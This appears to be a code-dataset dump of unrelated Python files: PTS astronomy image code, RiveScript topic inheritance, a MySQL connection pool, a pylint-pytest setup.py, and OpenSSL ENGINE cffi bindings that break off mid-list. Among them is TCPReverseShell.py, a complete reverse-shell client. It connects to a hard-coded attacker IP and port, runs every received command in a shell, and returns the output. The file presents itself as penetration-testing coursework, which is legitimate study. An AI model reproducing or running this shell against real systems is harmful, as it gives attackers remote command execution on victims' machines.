return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
| en | 0.659521 | #!/usr/bin/env python # -*- coding: utf8 -*- # ***************************************************************** # ** PTS -- Python Toolkit for working with SKIRT ** # ** © Astronomical Observatory, Ghent University ** # ***************************************************************** ## \package pts.core.misc.fluxes Contains the ObservedImageMaker class. # ----------------------------------------------------------------- # Ensure Python 3 compatibility # Import astronomical modules # Import the relevant PTS classes and modules # ----------------------------------------------------------------- # The speed of light # ----------------------------------------------------------------- This class ... The constructor ... :return: # Call the constructor of the base class # -- Attributes -- # The simulation prefix # The paths to the 'total' FITS files produced by SKIRT # The wavelengths of the simulation # Filter names # The instrument names # The filters for which the images should be created # The dictionary containing the images for various SKIRT output datacubes # The reference WCS # ----------------------------------------------------------------- This function ... :param simulation: :param output_path: :param filter_names: :param instrument_names: :param wcs_path: :param kernel_paths: :param unit: :param host_id: :return: # Obtain the paths to the 'total' FITS files created by the simulation # Get the list of wavelengths for the simulation # Get the simulation prefix # Set the filter names # Set the instrument names # Create the filters # Make the observed images # Set the WCS of the created images # Convolve the image with a given convolution kernel # Check whether the WCS for the image is defined. If not, show a warning and skip the convolution # Convert the units (WCS has to be loaded!) # Write the results # ----------------------------------------------------------------- This function ... :return: # Inform the user # Loop over the different filter names # Debugging # Create the filter # Add the filter to the list # ----------------------------------------------------------------- This function ... 
:param host_id: :return: # Inform the user # Loop over the different simulated images # Get the name of the instrument # If a list of instruments is defined an this instrument is not in this list, skip it # Get the name of the datacube (as given by SKIRT) # Debugging # Create a dictionary to contain the observed images for this FITS file # The filter convolution is performed remotely # Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names) # Add the resulting image frames to the dictionary # Add the observed image to the dictionary # The calculation is performed locally # Load the simulated image # Convert the frames from neutral surface brightness to wavelength surface brightness # Get the wavelength # Determine the name of the frame in the datacube # Divide this frame by the wavelength in micron # Set the new unit # Convert the datacube to a numpy array where wavelength is the third dimension # Loop over the different filters # Debugging # Calculate the observed image frame # Set the unit of the frame # Add the observed image to the dictionary # Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key) # ----------------------------------------------------------------- This function ... :param wcs_path: :return: # TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images) # Inform the user # Debugging # Load the WCS # Loop over the different images and set the WCS # Debugging # Set the coordinate system for this frame # ----------------------------------------------------------------- This function ... :param kernel_paths: :param host_id: :return: # Inform the user # If the convolutions must be performed remotely # Loop over the images # Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve. # Determine the kernel path for this image # Perform the remote convolution # The convolution is performed locally # Loop over the images # Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve. # Load the kernel # Debugging # Convolve this image frame # ----------------------------------------------------------------- This function ... :param self: :param unit: :return: # TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr # 1 Jy = 1e-26 * W / (m2 * Hz) # Inform the user # Get the pixelscale #pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel # Loop over the images # Debugging # Get the pivot wavelength of the filter # Determine the conversion factor # From surface brightness to flux density (no) #conversion_factor *= # From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz) # From W / (m2 * arcsec2 * Hz) to MJy / sr #conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("") # Convert # ----------------------------------------------------------------- This function ... :param output_path: :return: # Inform the user # Loop over the different images (self.images is a nested dictionary of dictionaries) # Determine the path to the output FITS file # Save the image # ----------------------------------------------------------------- This function ... 
:param datacube_path: :param prefix: :return: # ----------------------------------------------------------------- | 1.921061 | 2 |
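The conversion factor built in convert_units() above follows directly from its comments: multiply by lambda^2 / c to go from a per-micron to a per-Hz surface brightness, then apply 1 Jy = 1e-26 W / (m2 * Hz), the MJy prefix, and the arcsec2-to-steradian ratio. A stand-alone check with plain floats (the 70 micron pivot is an arbitrary example value, not any particular filter's pivot):
c_micron_per_s = 2.99792458e14                              # speed of light in micron / s
arcsec2_per_sr = (180.0 / 3.141592653589793 * 3600.0) ** 2  # ~4.2545e10 arcsec2 per steradian
pivot = 70.0                                                # example pivot wavelength in micron
# W / (m2 arcsec2 micron) -> W / (m2 arcsec2 Hz): multiply by lambda^2 / c
factor = pivot ** 2 / c_micron_per_s
# W / (m2 arcsec2 Hz) -> Jy / arcsec2: 1 Jy = 1e-26 W / (m2 Hz)
factor *= 1e26
# Jy / arcsec2 -> MJy / sr
factor *= 1e-6 * arcsec2_per_sr
print(factor)   # same factor the astropy-based code in convert_units() produces for this pivot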
venv/Lib/site-packages/rivescript/inheritance.py | Hazemcodes/GimmyBot | 154 | 9174 | # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itself.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itself.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| en | 0.90507 | # RiveScript-Python # # This code is released under the MIT License. # See the "LICENSE" file for more information. # # https://www.rivescript.com/ Recursively scan a topic and return a list of all triggers. Arguments: rs (RiveScript): A reference to the parent RiveScript instance. topic (str): The original topic name. thats (bool): Are we getting triggers for 'previous' replies? depth (int): Recursion step counter. inheritance (int): The inheritance level counter, for topics that inherit other topics. inherited (bool): Whether the current topic is inherited by others. Returns: []str: List of all triggers found. # Break if we're in too deep. # Keep in mind here that there is a difference between 'includes' and # 'inherits' -- topics that inherit other topics are able to OVERRIDE # triggers that appear in the inherited topic. This means that if the top # topic has a trigger of simply '*', then NO triggers are capable of # matching in ANY inherited topic, because even though * has the lowest # priority, it has an automatic priority over all inherited topics. # # The getTopicTriggers method takes this into account. All topics that # inherit other topics will have their triggers prefixed with a fictional # {inherits} tag, which would start at {inherits=0} and increment if this # topic has other inheriting topics. So we can use this tag to make sure # topics that inherit things will have their triggers always be on top of # the stack, from inherits=0 to inherits=n. # Important info about the depth vs inheritance params to this function: # depth increments by 1 each time this function recursively calls itrs. # inheritance increments by 1 only when this topic inherits another # topic. # # This way, '> topic alpha includes beta inherits gamma' will have this # effect: # alpha and beta's triggers are combined together into one matching # pool, and then those triggers have higher matching priority than # gamma's. # # The inherited option is True if this is a recursive call, from a topic # that inherits other topics. This forces the {inherits} tag to be added # to the triggers. This only applies when the top topic 'includes' # another topic. # topic: the name of the topic # depth: starts at 0 and ++'s with each recursion # Topic doesn't exist? # Collect an array of triggers to return. # Get those that exist in this topic directly. # The non-that structure is {topic}->[array of triggers] # The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info} # Does this topic include others? # Check every included topic. # Does this topic inherit others? # Check every inherited topic. # Collect the triggers for *this* topic. If this topic inherits any # other topics, it means that this topic's triggers have higher # priority than those in any inherited topics. Enforce this with an # {inherits} tag. Given one topic, get the list of all included/inherited topics. :param str topic: The topic to start the search at. :param int depth: The recursion depth counter. :return []str: Array of topics. # Break if we're in too deep. # Collect an array of all topics. # Does this topic include others? # Try each of these. # Does this topic inherit others? # Try each of these. | 2.75561 | 3 |
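To see what the {inherits=n} prefixes buy, here is a small stand-alone sketch (not RiveScript's actual sort code) of grouping triggers by inheritance level so that a topic's own triggers outrank those pulled in from topics it inherits, while untagged triggers fall to the back:
import re

def inherit_level(trigger):
    """Return (level, bare_trigger); untagged triggers sort after tagged ones here."""
    m = re.match(r"\{inherits=(\d+)\}(.*)", trigger)
    if m:
        return int(m.group(1)), m.group(2)
    return float("inf"), trigger

triggers = ["{inherits=1}*", "what is *", "{inherits=0}hello bot"]
for level, bare in sorted(inherit_level(t) for t in triggers):
    print(level, bare)
# prints the inherits=0 trigger first, then inherits=1, then the untagged one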
src/dataAccess/Connection.py | mattmillr/utaka | 1 | 9175 | <filename>src/dataAccess/Connection.py
#Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
connection pool abstraction over previous Connection.py which is now SingleConnection.py
sets up module scope connection pool, currently with no size limit
pool for both connections with dictionary cursors and regular cursors
reconnects to db every x hours depending on config file
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
def __init__(self, useDictCursor = False):
if len(dcp) > 0:
if useDictCursor:
self.innerConn = dcp.pop()
else:
self.innerConn = rcp.pop()
now = datetime.datetime.today()
if (now - dbTimeout) > self.innerConn.connectTime:
self.innerConn.close()
self.innerConn = SingleConnection(useDictCursor)
else:
self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
| <filename>src/dataAccess/Connection.py
#Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
connection pool abstraction over previous Connection.py which is now SingleConnection.py
sets up module scope connection pool, currently with no size limit
pool for both connections with dictionary cursors and regular cursors
reconnects to db every x hours depending on config file
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
def __init__(self, useDictCursor = False):
if len(dcp) > 0:
if useDictCursor:
self.innerConn = dcp.pop()
else:
self.innerConn = rcp.pop()
now = datetime.datetime.today()
if (now - dbTimeout) > self.innerConn.connectTime:
self.innerConn.close()
self.innerConn = SingleConnection(useDictCursor)
else:
self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
| en | 0.85452 | #Copyright 2009 Humanitarian International Services Group # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. Created Aug 4, 2009 connection pool abstraction over previous Connection.py which is now SingleConnection.py sets up module scope connection pool, currently with no size limit pool for both connections with dictionary cursors and regular cursors reconnects to db every x hours depending on config file @author: Andrew | 2.558036 | 3 |
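A hedged usage sketch for the pooled Connection wrapper above (table and column names are invented, and executeStatement() is assumed to hand back the fetched rows, which this module does not show):
conn = Connection(useDictCursor=True)
try:
    rows = conn.executeStatement(
        "SELECT userid, username FROM users WHERE userid = %s", (42,))
    for row in rows:
        print(row)
    conn.close()            # commit, then return the connection to the pool
except MySQLdb.Error:
    conn.cancelAndClose()   # roll back, then return the connection to the pool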
setup.py | DKorytkin/pylint-pytest | 0 | 9176 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| en | 0.352855 | #!/usr/bin/env python # -*- coding: utf-8 -*- | 1.327682 | 1 |
Shells/Python/Client/TCPReverseShell.py | lismore/OffensiveCyberTools | 1 | 9177 | # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
sock.connect(('192.168.1.95', 5000)) # Replace the IP and listening port to your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
if 'terminate' in sentCommand: # if we get a terminate string from the attack machine then we will close the socket, end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
sock.connect(('192.168.1.95', 5000)) # Replace the IP and listening port to your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
if 'terminate' in sentCommand: # if we get a terminate string from the attack machine then we will close the socket, end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| en | 0.555668 | # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments # Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore #========================================================================================================================================= # Python TCP Client #Start client function # create the socket object 'sock' # Replace the IP and listening port to your attack machine # start an infinite loop # read the 1st KB of the tcp socket # if we get a termiante string from the attack machine then we will close the socket, end the loop # or else, the sent command gets sent to the victim shell process # return shell result # return any shell errors #Main function #Program entry point | 2.982497 | 3 |
src/_cffi_src/openssl/engine.py | balabit-deps/balabit-os-6-python-cryptography | 0 | 9178 | <filename>src/_cffi_src/openssl/engine.py<gh_stars>0
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/engine.h>
"""
TYPES = """
static const long Cryptography_HAS_ENGINE_CRYPTODEV;
typedef ... ENGINE;
typedef ... RSA_METHOD;
typedef ... DSA_METHOD;
typedef ... ECDH_METHOD;
typedef ... ECDSA_METHOD;
typedef ... DH_METHOD;
typedef struct {
void (*seed)(const void *, int);
int (*bytes)(unsigned char *, int);
void (*cleanup)();
void (*add)(const void *, int, double);
int (*pseudorand)(unsigned char *, int);
int (*status)();
} RAND_METHOD;
typedef ... STORE_METHOD;
typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
typedef ... *ENGINE_CTRL_FUNC_PTR;
typedef ... *ENGINE_LOAD_KEY_PTR;
typedef ... *ENGINE_CIPHERS_PTR;
typedef ... *ENGINE_DIGESTS_PTR;
typedef ... ENGINE_CMD_DEFN;
typedef ... UI_METHOD;
static const unsigned int ENGINE_METHOD_RSA;
static const unsigned int ENGINE_METHOD_DSA;
static const unsigned int ENGINE_METHOD_RAND;
static const unsigned int ENGINE_METHOD_ECDH;
static const unsigned int ENGINE_METHOD_ECDSA;
static const unsigned int ENGINE_METHOD_CIPHERS;
static const unsigned int ENGINE_METHOD_DIGESTS;
static const unsigned int ENGINE_METHOD_STORE;
static const unsigned int ENGINE_METHOD_ALL;
static const unsigned int ENGINE_METHOD_NONE;
static const int ENGINE_R_CONFLICTING_ENGINE_ID;
"""
FUNCTIONS = """
ENGINE *ENGINE_get_first(void);
ENGINE *ENGINE_get_last(void);
ENGINE *ENGINE_get_next(ENGINE *);
ENGINE *ENGINE_get_prev(ENGINE *);
int ENGINE_add(ENGINE *);
int ENGINE_remove(ENGINE *);
ENGINE *ENGINE_by_id(const char *);
int ENGINE_init(ENGINE *);
int ENGINE_finish(ENGINE *);
void ENGINE_load_openssl(void);
void ENGINE_load_dynamic(void);
void ENGINE_load_builtin_engines(void);
void ENGINE_cleanup(void);
ENGINE *ENGINE_get_default_RSA(void);
ENGINE *ENGINE_get_default_DSA(void);
ENGINE *ENGINE_get_default_ECDH(void);
ENGINE *ENGINE_get_default_ECDSA(void);
ENGINE *ENGINE_get_default_DH(void);
ENGINE *ENGINE_get_default_RAND(void);
ENGINE *ENGINE_get_cipher_engine(int);
ENGINE *ENGINE_get_digest_engine(int);
int ENGINE_set_default_RSA(ENGINE *);
int ENGINE_set_default_DSA(ENGINE *);
int ENGINE_set_default_ECDH(ENGINE *);
int ENGINE_set_default_ECDSA(ENGINE *);
int ENGINE_set_default_DH(ENGINE *);
int ENGINE_set_default_RAND(ENGINE *);
int ENGINE_set_default_ciphers(ENGINE *);
int ENGINE_set_default_digests(ENGINE *);
int ENGINE_set_default_string(ENGINE *, const char *);
int ENGINE_set_default(ENGINE *, unsigned int);
unsigned int ENGINE_get_table_flags(void);
void ENGINE_set_table_flags(unsigned int);
int ENGINE_register_RSA(ENGINE *);
void ENGINE_unregister_RSA(ENGINE *);
void ENGINE_register_all_RSA(void);
int ENGINE_register_DSA(ENGINE *);
void ENGINE_unregister_DSA(ENGINE *);
void ENGINE_register_all_DSA(void);
int ENGINE_register_ECDH(ENGINE *);
void ENGINE_unregister_ECDH(ENGINE *);
void ENGINE_register_all_ECDH(void);
int ENGINE_register_ECDSA(ENGINE *);
void ENGINE_unregister_ECDSA(ENGINE *);
void ENGINE_register_all_ECDSA(void);
int ENGINE_register_DH(ENGINE *);
void ENGINE_unregister_DH(ENGINE *);
void ENGINE_register_all_DH(void);
int ENGINE_register_RAND(ENGINE *);
void ENGINE_unregister_RAND(ENGINE *);
void ENGINE_register_all_RAND(void);
int ENGINE_register_STORE(ENGINE *);
void ENGINE_unregister_STORE(ENGINE *);
void ENGINE_register_all_STORE(void);
int ENGINE_register_ciphers(ENGINE *);
void ENGINE_unregister_ciphers(ENGINE *);
void ENGINE_register_all_ciphers(void);
int ENGINE_register_digests(ENGINE *);
